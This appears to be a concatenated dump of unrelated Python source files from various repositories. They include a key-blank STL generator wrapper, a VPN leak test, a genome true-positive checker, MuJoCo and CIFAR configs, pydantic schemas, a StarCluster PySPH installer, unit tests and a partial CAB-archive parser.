parser.add_argument("-u", "--outline", dest='outline',
help="Key blank outline")
parser.add_argument("-w", "--warding", dest='warding',
help="Key warding")
parser.add_argument("-o", "--output", dest='output', default="a.stl",
help="Output file (defaults to a.stl)")
(args, remaining) = parser.parse_known_args()
def escape(s):
return s.translate(str.maketrans({'"': '\\"',
'\\': '\\\\'}));
scad = os.environ.get("SCAD", "openscad")
opts = []
if args.bitting is not None:
opts += ["-D", 'bitting="{}"'.format(escape(args.bitting))]
if args.outline is not None:
opts += ["-D", 'outline="{}"'.format(escape(args.outline))]
if args.warding is not None:
opts += ["-D", 'warding="{}"'.format(escape(args.warding))]
r = subprocess.call([scad, args.filename, "-o", args.output] + opts + remaining)
sys.exit(r)
|
.workshop/jupyterhub_config.py | blues-man/lab-tekton-pipelines | 109 | 12658702 | os.environ["OPENSHIFT_PROJECT"] = "{username}" |
test/hlt/pytest/python/com/huawei/iotplatform/client/dto/BatchTaskCreateOutDTO.py | yuanyi-thu/AIOT- | 128 | 12658781 | class BatchTaskCreateOutDTO(object):
def __init__(self):
self.taskID = None
def getTaskID(self):
return self.taskID
def setTaskID(self, taskID):
self.taskID = taskID
|
desktop_local_tests/windows/test_windows_packet_capture_disrupt_enable_new_adapter.py | UAEKondaya1/expressvpn_leak_testing | 219 | 12658792 | <reponame>UAEKondaya1/expressvpn_leak_testing
from desktop_local_tests.local_packet_capture_test_case_with_disrupter import LocalPacketCaptureTestCaseWithDisrupter
from desktop_local_tests.windows.windows_enable_new_adapter_disrupter import WindowsEnableNewAdapterDisrupter
class TestWindowsPacketCaptureDisruptEnableNewAdapter(LocalPacketCaptureTestCaseWithDisrupter):
'''Summary:
Tests whether traffic leaving the user's device leaks outside of the VPN tunnel when a higher
priority network adapter becomes active after connecting.
Details:
The test first identifies the highest priority adapter and disables it. It then connects to the
VPN and re-enables that adapter. The test looks for leaking traffic once the interface has been
disabled.
Discussion:
There are several ways in which a adapter could become active after connect:
* The adapter is "enabled" via Network Connections (in Control Panel)
* The adapter is enabled but there's no connectivity, e.g. the Ethernet cable is unplugged or
Wi-Fi isn't connected to a Wi-Fi network. We refer to this situation as the adapter having
"no network".
* The adapter never existed in the first place and is created after connect.
This test uses the first method to disable/re-enable the adapter to test for leaks. The other
two scenarios are valid test cases and should also be implemented.
Weaknesses:
Packet capture tests can be noisy. Traffic can be detected as a leak but in actual fact may not
be. For example, traffic might go to a server owned by the VPN provider to re-establish
connections. In general this test is best used for manual exploring leaks rather than for
automation.
Scenarios:
Requires two active adapters.
TODO:
Add tests for inactive and newly created adapters.
'''
def __init__(self, devices, parameters):
super().__init__(WindowsEnableNewAdapterDisrupter, devices, parameters)
|
tests/utils.py | mariot/djangorestframework-api-key | 462 | 12658793 | import typing
from rest_framework.decorators import api_view, permission_classes
from rest_framework.permissions import BasePermission
from rest_framework.response import Response
def create_view_with_permissions(
*classes: typing.Type[BasePermission],
) -> typing.Callable:
@api_view()
@permission_classes(classes)
def view(*args: typing.Any) -> Response:
return Response()
return view
|
paper/check-genome-true-positives.py | zihhuafang/slivar_vep105 | 162 | 12658796 | <gh_stars>100-1000
import toolshed
import collections
import hashlib
slivar_found = collections.defaultdict(list)
# first file is tsv from slivar
for d in toolshed.reader(1):
slivar_found[d["sample_id"]].append(d["chr:pos:ref:alt"])
shared_affected = 0
shared_affected_solved = 0
exact_match = 0
sv_del = 0
oocyte = 0
indel_plus_sv_comphet = 0
# 2nd file is participant_details.tsv
for d in toolshed.reader(2):
sample_id = d["entity:participant_details_id"]
if sample_id not in slivar_found: continue
if d["07_affected_status"] != "Affected": continue
shared_affected += 1
key = "chr%s:%s:%s:%s" % (d["13_Chrom-1"], d["14_Pos-1"], d["15_Ref-1"], d["16_Alt-1"])
if key == "chr:::": continue
shared_affected_solved += 1
if key in slivar_found[sample_id]:
print("OK", sample_id, key)
exact_match += 1
else:
sha = hashlib.sha256(sample_id.encode()).hexdigest()
#print("WTF", sample_id, key)
if key.endswith("del"):
sv_del += 1
elif sha in (
"c1b669b32e2b899a15bcd8e5d3e2cc9f5eb457a1b8a1c27fce2ab8f26750c050",
"8145446cdae4964156aefbb0eb1ab03f2866905de14942cffedc48b782de5086"):
oocyte += 1
elif sha in (
"2b2f722dcb68c22c654c4cc2a9d8db8bda08a88461d5d5d7d89c985ba726eb62",
"c52f9645ec80ce4c0c712bb4d8fad246e864b04d53ba94e9a29e3aac15f1985c",
):
indel_plus_sv_comphet += 1
elif sha == "6503b96da638ddab193fa7cbc1e5c20d626f5d2dda7dabe74b09ed4d3e2a677f":
print("mom:0/0 dad:0/1 kid:1/1 (because of sv deletion but other filters passed)")
elif sha == "8d853c417e5d02c5362e0ddce3666689f2feb8672e2293ff9483d4bd6d7ead42":
print(sample_id, key)
print("X. ref: CACCCTCCACGAT")
print("X. reported by RGP: pos:802 var:TCCAC/A")
print("X. found by our pipelines:")
print("X. pos:802 CCCT/C")
print("X. pos:808 AC/A")
else:
print("BAD", sample_id, key)
1/0
print("shared_affected", shared_affected)
print("shared_affected_solved: ", shared_affected_solved)
print("exact_match:", exact_match)
print("SV deletion (not sought here):", sv_del)
print("autosome het 2 girls shared with dad", oocyte)
print("comphet missed because 1 side was deletion:", indel_plus_sv_comphet)
"""
entity:participant_details_id 01_project_id 02_family_id 03_Individual_ID 06_sex 07_affected_status 08_phenotype_description 09_hpo_present 29_Date-Uploaded 04_paternal_id 05_maternal_id 11_Gene-1 12_Zygosity-1 13_Chrom-1 14_Pos-1 15_Ref-1 16_Alt-1 17_hgvsc-1 18_hgvsp-1 19_Transcript-1 10_hpo_absent 20_Gene-2 21_Zygosity-2 22_Chrom-2 23_Pos-2 24_Ref-2 25_Alt-2 26_hgvsc-2 27_hgvsp-2 28_Transcript-2 31_Notes 30_Other_seq_data
RGP_1003_3 Rare Genomes Project_Genomes RGP_1003 RGP_1003_3 Male Affected Limb-girdle muscular dystrophy HP:0003236 (Elevated serum creatine kinase)|HP:0012378 (Fatigue)|HP:0003325 (Limb-girdle muscle weakness)|HP:0003701 (Proximal muscle weakness) 3/1/2019
RGP_1004_3 Rare Genomes Project_Genomes RGP_1004 RGP_1004_3 Female Affected Limb-girdle muscular dystrophy HP:0012432 (Chronic fatigue)|HP:0006785 (Limb-girdle muscular dystrophy)|HP:0001324 (Muscle weakness)|HP:0003202 (Skeletal muscle atrophy) 3/1/2019
RGP_1004_4 Rare Genomes Project_Genomes RGP_1004 RGP_1004_4 Female Affected Limb-girdle muscular dystrophy HP:0006785 (Limb-girdle muscular dystrophy) 3/1/2019
RGP_1004_5 Rare Genomes Project_Genomes RGP_1004 RGP_1004_5 Female Affected Limb-girdle muscular dystrophy HP:0006785 (Limb-girdle muscular dystrophy) 3/1/2019
RGP_1006_3 Rare Genomes Project_Genomes RGP_1006 RGP_1006_3 Male Affected Myopathy HP:0002355 (Difficulty walking)|HP:0003473 (Fatigable weakness)|HP:0002359 (Frequent falls)|HP:0030237 (Hand muscle weakness)|HP:0007340 (Lower limb muscle weakness)|HP:0001324 (Muscle weakness)|HP:0003484 (Upper limb muscle weakness) 3/1/2019
RGP_1012_1 Rare Genomes Project_Genomes RGP_1012 RGP_1012_1 Female Unaffected Overgrowth; autism 3/1/2019
RGP_1012_2 Rare Genomes Project_Genomes RGP_1012 RGP_1012_2 Male Unaffected Overgrowth; autism 8/16/2019
RGP_1012_3 Rare Genomes Project_Genomes RGP_1012 RGP_1012_3 Male Affected Overgrowth; autism HP:0000729 (Autistic behavior)|HP:0001548 (Overgrowth) 3/1/2019 RGP_1012_2 RGP_1012_1
RGP_1013_3 Rare Genomes Project_Genomes RGP_1013 RGP_1013_3 Male Affected Myopathy HP:0003198 (Myopathy) 3/1/2019
"""
|
robogym/mujoco/warning_buffer.py | 0xflotus/robogym | 288 | 12658817 | <reponame>0xflotus/robogym
import collections
import logging
import mujoco_py.cymj as cymj
logger = logging.getLogger(__name__)
class MujocoErrorException(Exception):
""" Exception raised when mujoco error is called. """
pass
def error_callback(message):
""" Mujoco error callback """
message = message.decode()
full_message = f"MUJOCO ERROR: {message}"
logger.error(full_message)
raise MujocoErrorException(full_message)
# Set it once for all the processes
cymj.set_error_callback(error_callback)
class MjWarningBuffer:
"""
Buffering MuJoCo warnings.
That way they don't cause an exception being thrown which crashes the process,
but at the same time we store them in memory and can process.
One can potentially specify buffer capacity if one wants to use a circular buffer.
"""
def __init__(self, maxlen=None):
self.maxlen = maxlen
self._buffer = collections.deque(maxlen=self.maxlen)
self._prev_user_callback = None
def _intercept_warning(self, warn_bytes):
""" Intercept a warning """
warn = warn_bytes.decode() # Convert bytes to string
logger.warning("MUJOCO WARNING: %s", str(warn))
self._buffer.append(warn)
@property
def warnings(self):
""" Return a list of warnings to the user """
return list(self._buffer)
def enter(self):
""" Enable collecting warnings """
if self._prev_user_callback is None:
self._prev_user_callback = cymj.get_warning_callback()
cymj.set_warning_callback(self._intercept_warning)
def clear(self):
""" Reset warning buffer """
self._buffer.clear()
def exit(self):
""" Stop collecting warnings """
if self._prev_user_callback is not None:
cymj.set_warning_callback(self._prev_user_callback)
self._prev_user_callback = None
def __enter__(self):
""" Enter - context manager magic method """
self.enter()
def __exit__(self, exc_type, exc_val, exc_tb):
""" Exit - context manager magic method """
self.exit()
def __repr__(self):
""" Text representation"""
return "<{} warnings:{}>".format(self.__class__.__name__, len(self.warnings))
|
configs/linear/cifar10_res18.py | xyupeng/ContrastiveCrop | 148 | 12658829 | <reponame>xyupeng/ContrastiveCrop<filename>configs/linear/cifar10_res18.py<gh_stars>100-1000
# model
model = dict(type='ResNet', depth=18, num_classes=10, maxpool=False)
loss = dict(type='CrossEntropyLoss')
# dataset
root = '/path/to/your/dataset'
mean = (0.4914, 0.4822, 0.4465)
std = (0.2023, 0.1994, 0.2010)
batch_size = 512
num_workers = 4
data = dict(
train=dict(
ds_dict=dict(
type='CIFAR10',
root=root,
train=True,
),
trans_dict=dict(
type='cifar_linear',
mean=mean, std=std
),
),
test=dict(
ds_dict=dict(
type='CIFAR10',
root=root,
train=False,
),
trans_dict=dict(
type='cifar_test',
mean=mean, std=std
),
),
)
# training optimizer & scheduler
epochs = 100
lr = 10.0
optimizer = dict(type='SGD', lr=lr, momentum=0.9, weight_decay=0)
lr_cfg = dict( # passed to adjust_learning_rate()
type='MultiStep',
steps=epochs,
lr=lr,
decay_rate=0.1,
decay_steps=[60, 80],
)
# log, load & save
log_interval = 20
work_dir = None
resume = None
load = None
port = 10001
|
chapter2_training/model_db/src/db/schemas.py | sudabon/ml-system-in-actions | 133 | 12658865 | import datetime
from typing import Dict, Optional
from pydantic import BaseModel
class ProjectBase(BaseModel):
project_name: str
description: Optional[str]
class ProjectCreate(ProjectBase):
pass
class Project(ProjectBase):
project_id: int
created_datetime: datetime.datetime
class Config:
orm_mode = True
class ModelBase(BaseModel):
project_id: str
model_name: str
description: Optional[str]
class ModelCreate(ModelBase):
pass
class Model(ModelBase):
model_id: int
created_datetime: datetime.datetime
class Config:
orm_mode = True
class ExperimentBase(BaseModel):
model_id: str
model_version_id: str
parameters: Optional[Dict]
training_dataset: Optional[str]
validation_dataset: Optional[str]
test_dataset: Optional[str]
evaluations: Optional[Dict]
artifact_file_paths: Optional[Dict]
class ExperimentCreate(ExperimentBase):
pass
class ExperimentEvaluations(BaseModel):
evaluations: Dict
class ExperimentArtifactFilePaths(BaseModel):
artifact_file_paths: Dict
class Experiment(ExperimentBase):
experiment_id: int
created_datetime: datetime.datetime
class Config:
orm_mode = True
|
polymetis/polymetis/python/polymetis/_version.py | ali-senguel/fairo | 669 | 12658903 | import os
import json
import polymetis
__version__ = ""
# Conda installed: Get version of conda pkg (assigned $GIT_DESCRIBE_NUMBER during build)
if "CONDA_PREFIX" in os.environ and os.environ["CONDA_PREFIX"] in polymetis.__file__:
# Search conda pkgs for polymetis & extract version number
stream = os.popen("conda list | grep polymetis")
for line in stream:
info_fields = [s for s in line.strip("\n").split(" ") if len(s) > 0]
if info_fields[0] == "polymetis": # pkg name == polymetis
__version__ = info_fields[1]
break
# Built locally: Retrive git tag description of Polymetis source code
else:
# Navigate to polymetis pkg dir, which should be within the git repo
original_cwd = os.getcwd()
os.chdir(os.path.dirname(polymetis.__file__))
# Git describe output
stream = os.popen("git describe --tags")
version_string = [line for line in stream][0]
# Modify to same format as conda env variable GIT_DESCRIBE_NUMBER
version_items = version_string.strip("\n").split("-")
__version__ = f"{version_items[-2]}_{version_items[-1]}"
# Reset cwd
os.chdir(original_cwd)
if not __version__:
raise Exception("Cannot locate Polymetis version!")
|
linked_list_cycle_ii/solution.py | mahimadubey/leetcode-python | 528 | 12658915 | # Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
# @param head, a ListNode
# @return a list node
def detectCycle(self, head):
if head is None or head.next is None:
return None
slow = head
fast = head
while fast is not None and fast.next is not None:
slow = slow.next
fast = fast.next.next
if fast == slow:
break
# No cycle
if fast is None or fast.next is None:
return None
# Has a cycle, put `slow` back to head
slow = head
while True:
if fast == slow:
break
slow = slow.next
fast = fast.next
return slow
|
examples/sharepoint/pages/create_modern_page.py | theodoriss/Office365-REST-Python-Client | 544 | 12658945 | <reponame>theodoriss/Office365-REST-Python-Client<filename>examples/sharepoint/pages/create_modern_page.py
from office365.sharepoint.client_context import ClientContext
from office365.sharepoint.publishing.site_page import SitePage
from tests import test_client_credentials, test_team_site_url
ctx = ClientContext(test_team_site_url).with_credentials(test_client_credentials)
new_page = ctx.site_pages.pages.add()
new_page.save_draft(title="Latest News 456")
new_page.publish().execute_query()
pages = ctx.site_pages.pages.get().execute_query()
for page in pages: # type: SitePage
print(page.file_name)
|
grow/deployments/destinations/local_test.py | denmojo/pygrow | 335 | 12658957 | <reponame>denmojo/pygrow
from . import local
import unittest
class LocalDestinationTestCase(unittest.TestCase):
def test_out_dir(self):
config = local.Config(out_dir='~/test/')
destination = local.LocalDestination(config)
# Weakly verify out_dir is expanded.
self.assertNotIn('~', destination.out_dir)
if __name__ == '__main__':
unittest.main()
|
starcluster/sc_pysph.py | nauaneed/pysph | 293 | 12658974 | from starcluster.clustersetup import DefaultClusterSetup
from starcluster.logger import log
class PySPHInstallerBase(DefaultClusterSetup):
PYSPH_PROFILE = "/etc/profile.d/pysph.sh"
PYSPH_HOSTS = "/home/pysph/PYSPH_HOSTS"
PYSPH_USER = "pysph"
def _create_env(self, master):
master.ssh.execute(
r"""
echo $HOME
if [ ! -d ~/pysph_env ]; then
mkdir ~/pysph_env &&
virtualenv --system-site-packages ~/pysph_env;
fi
"""
)
def _install_pysph(self, master):
commands = r"""
. ~/pysph_env/bin/activate
if ! python -c "import pysph" &> /dev/null; then
export USE_TRILINOS=1
export ZOLTAN_INCLUDE=/usr/include/trilinos
export ZOLTAN_LIBRARY=/usr/lib/x86_64-linux-gnu
cd ~ &&
git clone https://github.com/pypr/pysph &&
cd pysph &&
python setup.py install
fi
"""
master.ssh.execute(commands)
def _configure_profile(self, node):
pysph_profile = node.ssh.remote_file(self.PYSPH_PROFILE, 'w')
pysph_profile.write("test -e ~/.bashrc && . ~/.bashrc")
pysph_profile.close()
class PySPHInstaller(PySPHInstallerBase):
def run(self, nodes, master, user, user_shell, volumes):
aliases = [n.alias for n in nodes]
log.info("Configuring PYSPH Profile")
for node in nodes:
self.pool.simple_job(self._configure_profile,
(node,))
self.pool.wait(len(nodes))
master.ssh.switch_user(self.PYSPH_USER)
log.info("Creating virtual environment")
self._create_env(master)
master.ssh.execute("echo '. ~/pysph_env/bin/activate' > ~/.bashrc")
log.info("Installing PySPH")
self._install_pysph(master)
log.info("Adding nodes to PYSPH hosts file")
pysph_hosts = master.ssh.remote_file(self.PYSPH_HOSTS, 'w')
pysph_hosts.write('\n'.join(aliases) + '\n')
def on_add_node(self, new_node, nodes, master, user, user_shell, volumes):
log.info("Configuring PYSPH Profile")
self._configure_profile(new_node)
master.ssh.switch_user(self.PYSPH_USER)
log.info("Adding %s to PYSPH hosts file" % new_node.alias)
pysph_hosts = master.ssh.remote_file(self.PYSPH_HOSTS, 'a')
pysph_hosts.write(new_node.alias + '\n')
pysph_hosts.close()
def on_remove_node(self, remove_node, nodes, master,
user, user_shell, volumes):
master.switch_user(self.PYSPH_USER)
log.info("Removing %s from PYSPH hosts file" % remove_node.alias)
master.ssh.remove_lines_from_file(self.PYSPH_HOSTS, remove_node.alias)
|
endtoend_tests/forseti/explain/why_denied_test.py | aarontp/forseti-security | 921 | 12658976 | <filename>endtoend_tests/forseti/explain/why_denied_test.py
# Copyright 2020 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import re
from endtoend_tests.helpers.forseti_cli import ForsetiCli
class TestExplainerWhyDenied:
"""Explainer why_denied tests."""
@pytest.mark.client
@pytest.mark.e2e
@pytest.mark.explainer
def test_why_denied(self, forseti_cli: ForsetiCli, forseti_model_readonly,
forseti_server_service_account: str,
project_id: str):
"""Test why_denied for why the Forseti SA doesn't have the
storage.buckets.delete permission.
Args:
forseti_cli (ForsetiCli): Instance of the forseti cli helper
forseti_model_readonly (Tuple): Model name & process result
forseti_server_service_account (str): Server service account email
project_id (str): Project id being scanned
"""
# Arrange
model_name, _, _ = forseti_model_readonly
forseti_cli.model_use(model_name=model_name)
# Act
result = forseti_cli.explainer_why_denied(
forseti_server_service_account, f'project/{project_id}',
permissions=['storage.buckets.delete'])
# Assert
assert result.returncode == 0, f'Forseti stdout: {str(result.stdout)}'
assert re.search(r'roles\/cloudmigration.inframanager', str(result.stdout))
assert re.search(r'roles\/owner', str(result.stdout))
assert re.search(r'roles\/storage.admin', str(result.stdout))
|
setup.py | nessessence/dropblock | 556 | 12658999 | <filename>setup.py
from setuptools import setup, find_packages
with open('requirements.txt', encoding='utf-8') as f:
required = f.read().splitlines()
with open('README.md', encoding='utf-8') as f:
long_description = f.read()
setup(
name='dropblock',
version='0.3.0',
packages=find_packages(),
long_description=long_description,
long_description_content_type='text/markdown',
install_requires=required,
url='https://github.com/miguelvr/dropblock',
license='MIT',
author='<NAME>',
author_email='<EMAIL>',
description='Implementation of DropBlock: A regularization method for convolutional networks in PyTorch. '
)
|
tests/test_additional_commands.py | ils-nsolanki/dev-buildpack | 133 | 12659009 | <reponame>ils-nsolanki/dev-buildpack
from build_pack_utils import utils
extn = utils.load_extension('lib/additional_commands')
class TestAdditionalCommandsExtension(object):
def test_no_additional_commands(self):
ctx = {}
tmp = extn.preprocess_commands(ctx)
assert tmp == []
def test_one_command_as_string(self):
ctx = {
'ADDITIONAL_PREPROCESS_CMDS': 'env'
}
tmp = extn.preprocess_commands(ctx)
assert len(tmp) == 1
assert tmp[0] == ['env']
def test_one_additional_command(self):
ctx = {
'ADDITIONAL_PREPROCESS_CMDS': ['env']
}
tmp = extn.preprocess_commands(ctx)
assert len(tmp) == 1
assert tmp[0] == ['env']
def test_two_additional_commands(self):
ctx = {
'ADDITIONAL_PREPROCESS_CMDS': ['env', 'run_something']
}
tmp = extn.preprocess_commands(ctx)
assert len(tmp) == 2
assert tmp[0] == ['env']
assert tmp[1] == ['run_something']
def test_command_with_arguments_as_string(self):
ctx = {
'ADDITIONAL_PREPROCESS_CMDS': ['echo "Hello World"']
}
tmp = extn.preprocess_commands(ctx)
assert len(tmp) == 1
assert tmp[0] == ['echo "Hello World"']
def test_command_with_arguments_as_list(self):
ctx = {
'ADDITIONAL_PREPROCESS_CMDS': [['echo', '"Hello World!"']]
}
tmp = extn.preprocess_commands(ctx)
assert len(tmp) == 1
assert len(tmp[0]) == 2
assert tmp[0][0] == 'echo'
assert tmp[0][1] == '"Hello World!"'
|
tests/unit/test_cli.py | ClementPruvot/slo-generator | 243 | 12659017 | <gh_stars>100-1000
# Copyright 2019 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import unittest
from mock import patch
from click.testing import CliRunner
from slo_generator.cli import main
from slo_generator.utils import load_config
from .test_stubs import CTX, mock_sd
cwd = os.path.dirname(os.path.abspath(__file__))
root = os.path.dirname(os.path.dirname(cwd))
class TestCLI(unittest.TestCase):
def setUp(self):
for key, value in CTX.items():
os.environ[key] = value
slo_config = f'{root}/samples/cloud_monitoring/slo_gae_app_availability.yaml' # noqa: E501
config = f'{root}/samples/config.yaml'
self.slo_config = slo_config
self.slo_metadata_name = load_config(slo_config,
ctx=CTX)['metadata']['name']
self.config = config
self.cli = CliRunner()
@patch('google.api_core.grpc_helpers.create_channel',
return_value=mock_sd(8))
def test_cli_compute(self, mock):
args = ['compute', '-f', self.slo_config, '-c', self.config]
result = self.cli.invoke(main, args)
self.assertEqual(result.exit_code, 0)
@patch('google.api_core.grpc_helpers.create_channel',
return_value=mock_sd(40))
def test_cli_compute_folder(self, mock):
args = [
'compute', '-f', f'{root}/samples/cloud_monitoring', '-c',
self.config
]
result = self.cli.invoke(main, args)
self.assertEqual(result.exit_code, 0)
def test_cli_compute_no_config(self):
args = [
'compute', '-f', f'{root}/samples', '-c',
f'{root}/samples/config.yaml'
]
result = self.cli.invoke(main, args)
self.assertEqual(result.exit_code, 1)
def test_cli_api(self):
# TODO: Write test
pass
def test_cli_migrate(self):
# TODO: Write test
pass
if __name__ == '__main__':
unittest.main()
|
tests/unit/containers/test_envvarcollector.py | senstb/aws-elastic-beanstalk-cli | 110 | 12659029 | <gh_stars>100-1000
# Copyright 2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License'). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the 'license' file accompanying this file. This file is
# distributed on an 'AS IS' BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from ebcli.containers.envvarcollector import EnvvarCollector
from mock import patch
from unittest import TestCase
class TestEnvvarCollector(TestCase):
def test_empty_environment(self):
self.assertDictEqual({}, EnvvarCollector().map)
self.assertSetEqual(set(), EnvvarCollector().to_remove)
def test_merge_non_overlapping_envs(self):
env0 = EnvvarCollector({'a': '0', 'b': '1'})
env1 = EnvvarCollector({'c': '3', 'd': '4'})
expected_envvars = {'a': '0', 'b': '1', 'c': '3', 'd': '4'}
self.assertDictEqual(expected_envvars, env0.merge(env1).filtered().map)
self.assertDictEqual(expected_envvars, env1.merge(env0).filtered().map)
self.assertSetEqual(set(), env0.merge(env1).to_remove)
self.assertSetEqual(set(), env1.merge(env0).to_remove)
def test_merge_overlapping_and_vars_to_remove(self):
env0 = EnvvarCollector({'a': '0', 'd': '1'})
env1 = EnvvarCollector({'a': '5', 'd': '5'}, {'d', 'c'})
self.assertEqual({'a': '5'}, env0.merge(env1).filtered().map)
self.assertEqual({'a': '0'}, env1.merge(env0).filtered().map)
self.assertSetEqual({'d', 'c'}, env0.merge(env1).to_remove)
self.assertSetEqual({'d', 'c'}, env1.merge(env0).to_remove)
def test_fitered_removed_all_envvars(self):
env = EnvvarCollector({'a': '5', 'd': '5'}, {'a', 'd'})
result = env.filtered()
self.assertDictEqual({}, result.map)
self.assertSetEqual(set(), result.to_remove)
def test_fitered_removed_some_envvars(self):
env = EnvvarCollector({'a': '5', 'd': '5'}, {'a'})
result = env.filtered()
self.assertDictEqual({'d': '5'}, result.map)
self.assertSetEqual(set(), result.to_remove)
def test_fitered_removed_no_envvars(self):
envvars = {'a': '5', 'd': '5'}
env = EnvvarCollector(envvars)
result = env.filtered()
self.assertDictEqual(envvars, result.map)
self.assertSetEqual(set(), result.to_remove)
|
fsf-server/modules/EXTRACT_CAB.py | akniffe1/fsf | 259 | 12659037 | <gh_stars>100-1000
#!/usr/bin/env python
#
# Author: <NAME>
# Description: Unpack CAB using cabextract as a helper.
# Basically returns a stream of all the uncompressed contents,
# multiple files are lumped together for displacement by other modules.
# Date: 12/02/2015
# Reference: http://download.microsoft.com/download/5/0/1/501ED102-E53F-4CE0-AA6B-B0F93629DDC6/Exchange/[MS-CAB].pdf
'''
Copyright 2016 Emerson Electric Co.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import sys
import os
import subprocess
from datetime import datetime as dt
from tempfile import mkstemp
from distutils.spawn import find_executable
from struct import pack, unpack
from collections import OrderedDict
def get_flag_enums(value):
db = {}
db['cfhdrPREV_CABINET'] = True if value == 0x1 else False
db['cfhdrNEXT_CABINET'] = True if value == 0x2 else False
db['cfhdrRESERVE_PRESENT'] = True if value == 0x4 else False
return db
def get_compression_type(value):
if value == 0x0: return 'None'
if value == 0x1: return 'MSZIP'
if value == 0x2: return 'QUANTUM'
if value == 0x3: return 'LZX'
return 'Unknown'
def last_modified(date, time):
year = (date >> 9) + 1980
month = (date >> 5) & 0xf
day = date & 0x1f
hour = time >> 11
minute = (time >> 5) & 0x3f
second = (time << 1) & 0x3e
return dt(year, month, day, hour, minute, second).__str__()
def get_attributes(attribs):
attributes = []
if attribs & 0x1: attributes.append('Read-only file')
if attribs & 0x2: attributes.append('Hidden file')
if attribs & 0x4: attributes.append('System file')
if attribs & 0x20: attributes.append('Modified since last backup')
if attribs & 0x40: attributes.append('Run after extraction')
if attribs & 0x80: attributes.append('Name contains UTF')
return attributes
# Use cabextract as a helper to get the data from various MS compression formats
def collect_cab(cabname, tmpfile):
cabextract_location = find_executable('cabextract')
args = [cabextract_location, '-F', cabname, '-p', tmpfile]
proc = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
decompressed = proc.stdout.read()
proc.communicate()
# CAB will return 0 if successful
if proc.returncode:
s.dbg_h.error('%s There was a problem getting data from the cab file...' % dt.now())
return decompressed
def parse_cab(buff, tmpfile):
# CFHEADER structure
magic = buff[0:4]
reserved1 = buff[4:8]
cbCabinet = unpack('<L', buff[8:12])[0]
reserved2 = buff[12:16]
coffFiles = unpack('<L', buff[16:20])[0]
reserved3 = buff[20:24]
versionMinor = ord(buff[24])
versionMajor = ord(buff[25])
cFolders = unpack('<H', buff[26:28])[0]
cFiles = unpack('<H', buff[28:30])[0]
flags = get_flag_enums(unpack('<H', buff[30:32])[0])
setID = unpack('<H', buff[32:34])[0]
iCabinet = unpack('<H', buff[34:36])[0]
# Optional fields of CFHEADER depending on flags field settings
cbCFHeader = unpack('<H', buff[36:38])[0] if flags['cfhdrRESERVE_PRESENT'] else 0
cbCFFolder = ord(buff[39]) if flags['cfhdrRESERVE_PRESENT'] else 0
cbCFData = ord(buff[40]) if flags['cfhdrRESERVE_PRESENT'] else 0
# Track offset due to optional/variable fields - end of CFHEADER structure
offset = 40 if flags['cfhdrRESERVE_PRESENT'] else 36
if flags['cfhdrRESERVE_PRESENT'] and cbCFHeader != 0:
abReserve = buff[offset:offset+cbCFHeader]
offset += cbCFHeader
if flags['cfhdrPREV_CABINET']:
# CabinetPrev
str_end = buff[offset:].index('\x00')
szCabinetPrev = buff[offset:offset+str_end]
offset += str_end+1
# DiskPrev
str_end = buff[offset:].index('\x00')
szDiskPrev = buff[offset:offset+str_end]
offset += str_end+1
if flags['cfhdrNEXT_CABINET']:
# CabinetNext
str_end = buff[offset:].index('\x00')
szCabinetNext = buff[offset:offset+str_end]
offset += str_end+1
# DiskNext
str_end = buff[offset:].index('\x00')
szDiskNext = buff[offset:offset+str_end]
offset += str_end+1
# CFFOLDER structure
counter = 0
compression_types = []
while counter < cFolders:
coffCabStart = unpack('<L', buff[offset:offset+4])[0]
cCfData = unpack('<H', buff[offset+4:offset+6])[0]
typeCompress = unpack('<H', buff[offset+6:offset+8])[0] & 0xf # MASK_TYPE
offset += 8
if flags['cfhdrRESERVE_PRESENT'] and cbCFFolder != 0:
cffolder_abReserve = buff[offset:offset+cbCFFolder]
offset += cbCFFolder
compression_types.append(get_compression_type(typeCompress))
counter += 1
# Collect CFHEADER and CFFOLDER meta
EXTRACT_CAB = OrderedDict([('ID', hex(setID)),
('Version', '%s.%s' % (versionMajor, versionMinor)),
('Compression Used', sorted(set(compression_types)))])
# CFFILE structure
counter = 0
while counter < cFiles:
cbFile = unpack('<L', buff[offset:offset+4])[0]
uoffFolderStart = unpack('<L', buff[offset+4:offset+8])[0]
iFolder = unpack('<H', buff[offset+8:offset+10])[0]
date = unpack('<H', buff[offset+10:offset+12])[0]
time = unpack('<H', buff[offset+12:offset+14])[0]
attribs = unpack('<H', buff[offset+14:offset+16])[0]
str_end = buff[offset+16:].index('\x00')
szName = buff[offset+16:offset+16+str_end].replace('\\','/')
offset += 16+str_end+1
# Collect CFFILE Meta
EXTRACT_CAB['Object_%s' % counter] = OrderedDict([('Name', szName),
('Last Modified', last_modified(date, time)),
('Attributes', get_attributes(attribs)),
('Buffer', collect_cab(szName, tmpfile))])
counter += 1
return EXTRACT_CAB
def EXTRACT_CAB(s, buff):
EXTRACT_CAB = {}
